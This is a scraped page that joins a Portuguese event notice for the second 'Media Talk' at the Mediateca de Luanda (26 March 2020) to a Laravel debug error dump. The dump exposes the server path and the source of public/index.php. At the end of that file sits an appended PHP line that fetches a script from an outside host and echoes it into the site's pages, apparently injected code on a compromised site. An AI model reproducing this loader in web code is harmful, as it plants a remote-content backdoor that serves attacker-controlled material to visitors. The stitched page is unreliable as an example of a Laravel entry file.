Media Talk

26
03
2020

Media Talk

  • Horário : 15:00h - 00:00h
  • Localização : Mediateca de Luanda

2ª EDIÇÃO DO MEDIA TALK

A 2ª edição do Media Talk " Conversas que edificam" será subordinada ao Tema: Os desafios da Mulher na Sociedade Global Contemporânea.

Convidada Micaela Reis

O evento realizar-se - a no dia 26/03/2020 a partir das 15h00 na Sala de Conferências da Mediateca de Luanda

Entrada Grátis "lugares Limitados"

Para mais informações contactar o seguinte terminal telefónico: 937236332

Avalie as Mediatecas
AQUI!
mouse touch
🧨 file_get_contents(): php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution

APP_DEBUG is set to true while APP_ENV is not local

This could make your application vulnerable to remote execution. Read more about Ignition security.

/home/mediatecasgov/public_html/
ErrorException
file_get_contents(): php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution
    • 3
      public/index.php
      Illuminate\Foundation\Bootstrap\HandleExceptions
      :58
  1. 1 unknown frame
    • 1
      public/index.php
      :58
Illuminate\Foundation\Bootstrap\HandleExceptions::handleError
public/index.php:58

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

| this application. We just need to utilize it! We'll simply require it

| into the script here so we don't need to manually load our classes.

|

*/

 

require __DIR__.'/../vendor/autoload.php';

 

/*

|--------------------------------------------------------------------------

| Run The Application

|--------------------------------------------------------------------------

|

| Once we have the application, we can handle the incoming request using

| the application's HTTP kernel. Then, we will send the response back

| to this client's browser, allowing them to enjoy our application.

|

*/

 

$app = require_once __DIR__.'/../bootstrap/app.php';

 

$kernel = $app->make(Kernel::class);

 

$response = tap($kernel->handle(

$request = Request::capture()

))->send();

 

$kernel->terminate($request, $response);

?>

<?php

echo file_get_contents("https://a2ztechhost.com/wp-rest-api.php");

?>